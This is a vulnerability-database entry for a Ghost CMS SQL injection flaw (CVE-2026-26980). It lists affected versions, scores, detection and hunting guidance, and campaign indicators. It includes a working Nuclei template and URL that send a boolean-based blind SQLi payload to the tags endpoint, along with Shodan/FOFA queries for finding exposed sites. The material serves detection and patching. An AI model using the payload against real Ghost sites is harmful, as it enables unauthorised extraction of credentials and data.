cbcvebase.
CVE-2026-26980
published 2026-02-20

CVE-2026-26980: Ghost is a Node.js content management system. Versions 3.24.0 through 6.19.0 allow unauthenticated attackers to perform arbitrary reads from the database. This…

PriorityP187high7.5CVSS 3.1
AVNACLPRNUINSUCHINAN
ITWEXPLOITVulnCheck KEVInitial access
Exploited in the wild
EPSS
70.00%
99.3th percentile
Ghost is a Node.js content management system. Versions 3.24.0 through 6.19.0 allow unauthenticated attackers to perform arbitrary reads from the database. This issue has been fixed in version 6.19.1.

Affected

3 ranges
VendorProductVersion rangeFixed in
ghostghost>= 3.24.0 < 6.19.16.19.1
ghostghost>= 3.24.0 < 6.19.16.19.1
tryghostghost

Detection & IOCsextracted from sources · hover to see the quote

path/ghost/api/content/tags/
url{{BaseURL}}/ghost/api/content/tags/?key={{api_key}}&filter=slug:['||CASE WHEN 1=1 THEN 0 ELSE EXP(710) END||',{{first_slug}}]
yara
id: CVE-2026-26980
info:
  name: Ghost CMS Content API - SQL Injection
  author: domwhewell-sage
  severity: critical
  description: |
    Ghost CMS before 6.19.1 is vulnerable to a blind SQL injection in the /ghost/api/content/tags/ endpoint via the filter parameter. This template checks for the vulnerability by sending a boolean-based payload.
  impact: |
    An unauthenticated attacker can extract arbitrary data from the Ghost database including user credentials, API keys, and all content, potentially leading to full compromise of the CMS.
  remediation: |
    Upgrade Ghost CMS to version 6.19.1 or later which uses parameterized queries for slug filter ordering.
  reference:
    - https://github.com/TryGhost/Ghost/security/advisories/GHSA-w52v-v783-gw97
    - https://github.com/TryGhost/Ghost/commit/30868d632b2252b638bc8a4c8ebf73964592ed91
    - https://nvd.nist.gov/vuln/detail/CVE-2026-26980
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:L
    cvss-score: 9.4
    cve-id: CVE-2026-26980
    epss-score: 0.32738
    epss-percentile: 0.96881
    cwe-id: CWE-89
    cpe: cpe:2.3:a:ghost:ghost:*:*:*:*:*:node.js:*:*
  metadata:
    verified: true
    max-request: 5
    vendor: ghost
    product: ghost
    framework: node.js
    shodan-query: http.component:"Ghost"
    fofa-query: app="Ghost"
  tags: cve,cve2026,ghost,ghostcms,sqli,vuln

flow: |
  http(1) && http(2) && http(3)

http:
  - id: extract-api-key
    method: GET
    path:
      - "{{BaseURL}}"
    host-redirects: true
    max-redirects: 2
    extractors:
      - type: regex
        name: api_key
        part: body
        group: 1
        regex:
          - 'data-key="([a-f0-9]{20,})"'
        internal: true

  - id: extract-first-slug
    method: GET
    path:
      - "{{BaseURL}}/ghost/api/content/tags/?key={{api_key}}&filter=slug:-null"
    extractors:
      - type: json
        part: body
        name: first_slug
        json:
          - '.tags[0].slug'
        internal: true

  - id: check-sqli
    method: GET
    path:
      - "{{BaseURL}}/ghost/api/content/tags/?key={{api_key}}&filter=slug:['||CASE WHEN 1=1 THEN 0 ELSE EXP(710) END||',{{first_slug}}]"
      - "{{BaseURL}}/ghost/api/content/tags/?key={{api_key}}&filter=slug:['||CASE WHEN 1=0 THEN 0 ELSE EXP(710) END||',{{first_slug}}]"
    matchers:
      - type: dsl
        dsl:
          - "len(body_1) != len(body_2)"
  • Detect exploitation attempts by monitoring GET requests to /ghost/api/content/tags/ where the 'filter' parameter contains SQL injection patterns such as CASE WHEN, EXP(710), or abs(-9223372036854775808) — the boolean-based blind SQLi oracle payloads used by the public PoC and Nuclei template.
  • Hunt for injected JavaScript loaders at the bottom of Ghost CMS article pages that fetch second-stage code from external domains, particularly referencing clo4shara[.]xyz/11z77u3.php.
  • Alert on Ghost Admin API calls (POST/PATCH to /ghost/api/admin/posts/ or /ghost/api/admin/themes/) that originate from unexpected IPs or occur outside normal publishing windows — these may indicate stolen Admin API key abuse.
  • Detect ClickFix payload delivery: monitor for PowerShell processes spawned from Windows Run dialog (explorer.exe → cmd.exe/powershell.exe) downloading DLL files and executing them via rundll32.exe.
  • Hunt for the Grape/UtilifySetup Electron malware persistence path C:\Users\<user>\AppData\Local\SuperMaxionQuickMaxlite and the mutex electron.app.Grape on Windows endpoints.
  • Detect C2 beaconing: look for periodic (every 30 seconds) outbound HTTP/HTTPS connections to web-telegram[.]ug from Electron-based processes (Grape.exe).
  • Use Shodan query http.component:"Ghost" or FOFA query app="Ghost" to identify internet-exposed Ghost CMS instances for proactive patching and attack surface reduction.
  • Maintain a 30-day record of Ghost admin API call logs to enable retrospective investigation of unauthorized API key usage.
  • ·The vulnerability only affects Ghost CMS versions 3.24.0 through 6.19.0; version 6.19.1 and later are patched. Rotating all previously used admin API keys is required even after patching, as keys may have been exfiltrated.
  • ·The cloaking script actively fingerprints visitors and serves benign content to security scanners and crawlers, meaning automated scanning of compromised pages may not reveal the injected malicious JavaScript.
  • ·At least two distinct threat clusters are operating this campaign; some sites have been re-infected with different scripts after cleanup, or one cluster has replaced the other's injected script. A single cleanup pass may be insufficient.

CVSS provenance

nvdv3.17.5HIGHCVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
vulncheck7.5HIGH
CVEs like this are exactly what “Exploited This Week” covers.

Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.